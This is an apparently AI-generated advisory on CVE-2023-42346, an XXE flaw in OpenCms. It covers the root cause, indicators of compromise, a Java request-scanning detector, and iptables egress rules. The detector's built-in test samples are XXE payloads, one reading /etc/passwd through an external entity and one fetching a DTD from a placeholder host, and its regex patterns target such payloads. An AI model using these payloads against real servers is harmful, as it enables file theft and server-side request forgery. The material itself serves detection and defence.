CVE-2023-42346 Overview
CVE-2023-42346 is an XML External Entity (XXE) vulnerability affecting Alkacon OpenCms versions prior to 16. The flaw allows a remote, unauthenticated attacker to submit crafted XML containing a <!DOCTYPE> declaration that references an external host. The parser resolves the external entity, enabling out-of-band data exfiltration and server-side request forgery against internal resources. The weakness is classified as [CWE-611] Improper Restriction of XML External Entity Reference.
Critical Impact
Unauthenticated attackers can exploit the XML parser over the network to read sensitive files and probe internal services without user interaction.
Affected Products
- Alkacon OpenCms versions before 16
Discovery Timeline
- 2026-05-08 - CVE-2023-42346 published to NVD
- 2026-05-11 - Last updated in NVD database
Technical Details for CVE-2023-42346
Vulnerability Analysis
Alkacon OpenCms is a Java-based open-source content management system used to publish enterprise websites. The application accepts XML input through several content management workflows. Versions before 16 configure the underlying XML parser without disabling external entity resolution. When user-supplied XML contains a <!DOCTYPE> declaration that points to an external host, the parser fetches that resource and inlines the response.
An attacker can leverage this behavior to read local files via the file:// scheme, contact internal-only HTTP services, or trigger blind out-of-band callbacks to attacker-controlled infrastructure. The confidentiality impact is high, while integrity and availability remain unaffected per the published CVSS vector. Additional technical analysis is available in the Watchtowr Analysis on XXE in OpenCMS.
Root Cause
The root cause is a misconfigured XML parser that fails to disable Document Type Definition (DTD) processing and external entity resolution. Secure defaults such as FEATURE_SECURE_PROCESSING and disallow-doctype-decl are not enforced in the affected code paths.
Attack Vector
The attack vector is network-based and requires no authentication or user interaction. An attacker sends a crafted XML document to an OpenCms endpoint that accepts XML input. The XML payload defines an external entity referencing either a local file path or an attacker-controlled host. When the parser processes the document, it resolves the entity and exposes the contents through error messages, response bodies, or out-of-band channels.
No verified public proof-of-concept code is published in the NVD entry. The Watchtowr write-up referenced above documents the exploitation primitives observed against the affected endpoints.
Detection Methods for CVE-2023-42346
Indicators of Compromise
- Inbound HTTP requests to OpenCms containing <!DOCTYPE and SYSTEM keywords in request bodies or parameters.
- Outbound DNS or HTTP requests originating from the OpenCms host to unexpected external domains shortly after XML processing.
- Access log entries referencing XML upload, import, or content-creation endpoints with unusually large request bodies.
Detection Strategies
- Inspect web server and application logs for XML payloads referencing file://, http://, or ftp:// schemes inside DTD declarations.
- Deploy web application firewall rules that flag or block XML requests containing external entity declarations.
- Correlate outbound network connections from the OpenCms Java process against an allowlist of expected destinations.
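An added example, not from OpenCms or any vendor, of the log-inspection strategy above: a small Java scanner that flags request bodies or parameters carrying a DOCTYPE or ENTITY declaration with a file://, http://, https:// or ftp:// external identifier. It URL-decodes input first, because payloads submitted as form parameters arrive percent-encoded and would otherwise slip past a literal match. The class name and the sample request bodies are constructed.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.regex.Pattern;

public class XxeRequestDetector {

    // DOCTYPE with an external identifier pointing at one of the schemes named
    // in the detection strategy. CASE_INSENSITIVE and DOTALL so that keyword
    // casing tricks and multi-line bodies still match.
    static final Pattern EXTERNAL_DTD = Pattern.compile(
        "<!DOCTYPE[^>]*(SYSTEM|PUBLIC)[^>]*?(file|https?|ftp)://",
        Pattern.CASE_INSENSITIVE | Pattern.DOTALL);
    // Internal-subset entity (general or parameter) with an external identifier.
    static final Pattern EXTERNAL_ENTITY = Pattern.compile(
        "<!ENTITY\\s+%?\\s*\\w+\\s+(SYSTEM|PUBLIC)\\s+[\"'][^\"']*?(file|https?|ftp)://",
        Pattern.CASE_INSENSITIVE | Pattern.DOTALL);

    // Form-encoded parameters arrive percent-encoded; decode before matching.
    // A plain XML body contains no '%' sequences and passes through unchanged.
    static String normalise(String body) {
        try {
            return URLDecoder.decode(body, StandardCharsets.UTF_8);
        } catch (IllegalArgumentException e) {
            return body; // not valid percent-encoding, scan it as-is
        }
    }

    static boolean isSuspicious(String body) {
        String s = normalise(body);
        return EXTERNAL_DTD.matcher(s).find() || EXTERNAL_ENTITY.matcher(s).find();
    }

    public static void main(String[] args) {
        // Constructed sample request bodies, not captured traffic.
        String[] samples = {
            "<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY e SYSTEM \"file:///etc/passwd\">]><x>&e;</x>",
            "content=%3C%21DOCTYPE+x+SYSTEM+%22http%3A%2F%2Fplaceholder.invalid%2Fx.dtd%22%3E%3Cx%2F%3E",
            "<?xml version=\"1.0\"?><page><title>Hello</title></page>"
        };
        for (String s : samples) {
            System.out.println((isSuspicious(s) ? "FLAG " : "ok   ") + s);
        }
    }
}
```

The first two samples are flagged and the third passes; pair a hit with the outbound-connection correlation from the same list before treating it as confirmed exploitation.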
Monitoring Recommendations
- Forward OpenCms application and access logs to a centralized analytics platform for retention and anomaly detection.
- Monitor for sudden access to sensitive local files such as /etc/passwd, application configuration, or credential stores by the Java runtime.
- Alert on DNS lookups from the OpenCms server resolving to interaction services commonly used in XXE exfiltration testing.
How to Mitigate CVE-2023-42346
Immediate Actions Required
- Upgrade Alkacon OpenCms to version 16 or later, which addresses the XML parser configuration.
- Restrict network egress from OpenCms servers so the application cannot reach arbitrary external hosts.
- Audit recent XML-processing endpoints for evidence of exploitation prior to patching.
Patch Information
Alkacon resolved the issue in OpenCms 16. Operators should upgrade to the fixed release and verify that XML parsing components used by custom modules also disable DTD processing. Refer to the Watchtowr Analysis on XXE in OpenCMS for context on the affected functionality.
Workarounds
- Place a reverse proxy or WAF in front of OpenCms to strip or reject requests containing <!DOCTYPE declarations.
- Disable XML import and content-upload endpoints for untrusted users until the upgrade is applied.
- Apply strict egress filtering so the application server cannot initiate outbound DNS or HTTP traffic to untrusted destinations.
# Example egress restriction using iptables to block outbound HTTP/HTTPS from the OpenCms host
# Assumes the servlet container runs as the "tomcat" user; append ACCEPT rules for any
# legitimate destinations (package mirrors, upstream APIs) before these REJECT rules.
iptables -A OUTPUT -p tcp --dport 80 -m owner --uid-owner tomcat -j REJECT
iptables -A OUTPUT -p tcp --dport 443 -m owner --uid-owner tomcat -j REJECT
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.